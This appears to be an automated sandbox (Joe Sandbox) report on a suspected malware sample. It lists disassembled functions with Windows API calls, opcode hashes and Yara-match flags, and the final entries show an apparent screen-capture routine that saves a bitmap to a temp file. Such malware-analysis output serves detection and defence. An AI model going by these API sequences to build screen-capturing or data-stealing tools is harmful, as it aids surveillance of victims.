Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
Part of subcall function 02152141: _free.LIBCMT ref: 02152178
Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9

Part of subcall function 02152141: _free.LIBCMT ref: 021521A0
Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0215B900

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction ID: cc5f61511d11f8d0493666905825e2084d85f26e1dabf6228f2d9c559cfa0728
Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction Fuzzy Hash: 1C014932B95124DFCB14AF34DC80ABA33A9DF05311F0441FAEE12DB281DB355E048B50

Function 0215B5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
Part of subcall function 02152141: _free.LIBCMT ref: 02152178
Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9

EnumSystemLocalesW.KERNEL32(0043B645,00000001,00000006,?,02150A1C,?,0215BC4D,02150A1C,?,?,?,?,?,02150A1C,?,?), ref: 0215B61B

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction ID: b516d1b0ac5d9933a959eda907d217c0dea80a0b6278f930da6196a73f09f9ad
Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction Fuzzy Hash: D5F022363047149FDB245F39DC80B7ABBD1EF8032CF1440ACFE058B640D77199028A84

Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684

Function 02155427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0215047A,?,00000004), ref: 0215547A

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction ID: 9fb8a9466bc970bd76f910d33cd16e61a4e42a3e53a39d50847b73e648a73a9f
Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction Fuzzy Hash: C0F096316C0328FFDB155F60DC01F6E7B66EF04B12F504155FD1566190DB719920AA99

Function 02155034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0214E654: RtlEnterCriticalSection.NTDLL(01CD0DAF), ref: 0214E663

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 0215506C

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction ID: b6eb457f5ff10e666bda82094dfe30fa0b79a3fb9656d8377797ef75a17bf0ab
Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction Fuzzy Hash: 73F03C32A50314DFEB10EF68D905B5D77E1AF05721F104266F914DB2E1CB7599408F49

Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49

Function 0215B4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
Part of subcall function 02152141: _free.LIBCMT ref: 02152178
Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,00000006,?,?,0215BCAB,02150A1C,?,?,?,?,?,02150A1C,?,?,?), ref: 0215B520

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction ID: 35f680edbebab78852d78be61974037db48c71b566162fade5e959ba2068a9aa
Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction Fuzzy Hash: A1F0553A34020897CB089F36DC4476ABF90EFC1754F0A009DEF1A8B290C3319942C790

Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794

Function 021308CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00410672,0212FE60), ref: 021308D2

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBC1

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 004373D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105

Function 004071AB Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9653ad00092ae3c397eaa5fd62b1023da30322e2c3038988a006d2826d0943b
Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
Opcode Fuzzy Hash: f9653ad00092ae3c397eaa5fd62b1023da30322e2c3038988a006d2826d0943b
Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96

Function 021476EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction ID: 7de1b4a7a72910040d81cf13f9975e42ec218cbf50fb294efffadb8f94a8f1eb
Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction Fuzzy Hash: A4D1B5721481E30ACB2D4A39847443AFFE26B421A530E47AED4FBCA5C6EF24D656D660

Function 02147FCE Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 8da643550bc72396a068e7c871e35f0a9939067fd46eea51133b5dd34805198c
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 0E9175721490E34EEB6D463E887443EFEE15B426A530B079ED8FACB1C1EF24D655D620

Function 00427D67 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624

Function 02148289 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 22e64b7d6925aafd8a97cbc1014c6b7ed4fb1ee68808eada531bd7cf62e36743
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 079163722490E34AEB6D467E893413EFFE15B421A530F07ADD4FACA1C5EF24C655D620

Function 00428022 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628

Function 02147D07 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 17d51d5b300be6fda15d6e9c51080074a5fe89cb95b8a1fe99688159c0e7d008
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 099174722490A30AEB2D463D857413EFFE19B421A531A07AEE4FACF1C1EF24D656D620

Function 00427AA0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628

Function 0214D755 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: fc32b042fd186def8b2cba39c5a16b1649e3a497277ad81bfbc99154b392c6fd
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: A36187717C070A6ADE386E6CB894BBE6395AF41B0CF04047AE98EDF2C0DF159942C756

Function 0042D4EE Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E

Function 02147A5D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: c4c54d945bfdd87da21493bcb559a30089809b9406bf86a921bfb93a5efde413
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 498160722490E74AEB6D467E847403EFFE19B421A531E079ED4FACB1C1EF249366D620

Function 004277F6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624

Function 021487C7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: eab27791ce22bb8c9b75661be7e3ded75c96187e7993526e5c1fc4454fc67fc3
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: BE1127B72C004347D6188B3EDCB46BBE385EBC6228B2F967AD14D4B758DF22E145D600

Function 00428560 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C

Function 004B0083 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b0000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: e34f56f3bfe50da565a1e1af7ef5e3310d146e548d978d23d973017875ff0dc5
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 951170723401009FD754DE59DCC1FE773EAEB89321B29806AED08CB316E67AE842C764

Function 02120D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 6a7ae1ff5e9c438eb39d1739dd139b69842fd91671cf499703bb93b43dee2957
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 3C012B766516148FDF21CF20C804BAA33F5FB99205F1541B4E506D7341E370A845CB80

Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
GetClientRect.USER32(?,?), ref: 0040214A
GetDC.USER32(?), ref: 00402151
CreateSolidBrush.GDI32(00646464), ref: 00402164
SelectObject.GDI32(00000000,00000000), ref: 00402178
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
SelectObject.GDI32(00000000,00000000), ref: 00402191
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
SelectObject.GDI32(00000000,00000000), ref: 004021EA
SetBkMode.GDI32(?,00000001), ref: 00402267
SetTextColor.GDI32(?,00000000), ref: 00402276
_wcslen.LIBCMT ref: 0040227F

Strings

Tahoma, xrefs: 004021BE

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14

Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025CD
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
ReleaseCapture.USER32 ref: 004025F2
GetDC.USER32(00000000), ref: 00402619
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
CreateCompatibleDC.GDI32(?), ref: 004026A9
SelectObject.GDI32(00000000,00000000), ref: 004026B3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
ShowWindow.USER32(?,00000000), ref: 004026EA
GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
DeleteFileW.KERNEL32(?), ref: 00402731
DeleteDC.GDI32(00000000), ref: 00402738
DeleteObject.GDI32(00000000), ref: 0040273F
ReleaseDC.USER32(00000000,?), ref: 0040274D
DestroyWindow.USER32(?), ref: 00402754
SetCapture.USER32(?), ref: 004027A1
GetDC.USER32(00000000), ref: 004027D5
ReleaseDC.USER32(00000000,00000000), ref: 004027EB
GetKeyState.USER32(0000001B), ref: 004027F8
DestroyWindow.USER32(?), ref: 0040280D

Strings

gya, xrefs: 0040270B

Memory Dump Source

Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: gya
API String ID: 2545303185-1989253062
Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
